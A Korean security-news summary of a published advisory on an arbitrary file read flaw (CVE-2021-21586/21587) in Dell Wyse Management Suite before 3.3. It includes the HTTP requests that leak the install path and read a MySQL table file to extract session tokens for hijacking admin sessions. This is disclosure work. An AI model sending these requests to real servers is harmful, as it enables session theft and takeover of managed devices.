[하루한줄] CVE-2021-21586/21587: Dell Wyse Management Suite Arbitrary File Read

URL

Technical Advisory – Arbitrary File Read in Dell Wyse Management Suite (CVE-2021-21586, CVE-2021-21587)

Target

  • Dell Wyse Management Suit < 3.3

Explain

Dell의 클라우드 엔드포인트 관리 솔루션인 Wyse Management Suite(WMS)에서 데이터베이스 파일을 포함한 Arbitrary File Read 취약점의 세부 정보가 공개되었습니다.

WMS의 /ccm-web/image/osfilePathfileName 매개변수를 받아 시스템 경로에서 파일을 검색합니다. 장치 ID를 사용해 유효하지 않은 요청을 보내면 다음과 같이 오류 메세지를 반환합니다.

PUT /ccm-web/image/pull/a/b HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149

-

HTTP/1.1 500 
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
...

C:\Program Files\DELL\Software\repository\imagePull\staging\a\b (The system cannot find the path specified)

오류 메세지에서 WMS가 설치된 시스템의 경로가 노출되며 아래와 같이 세션 토큰이 있는 MySQL 데이터베이스 테이블인 [PATH]\DELL\WMS\Database\SQL\stratus\persistentlogin.ibd 파일에서 JSESSIONID 값을 추출할 수 있고 이는 세션 하이재킹으로 이어질 수 있습니다.

GET /ccm-web/image/os?filePath=C:\Program Files\DELL\WMS\Database\SQL\stratus&fileName=persistentlogin.ibd HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149

해당 취약점을 악용하면 관리 인터페이스의 BIOS 패스워드 재설정 및 VNC를 통한 원격 터미널 등의 기능에 액세스할 수 있습니다.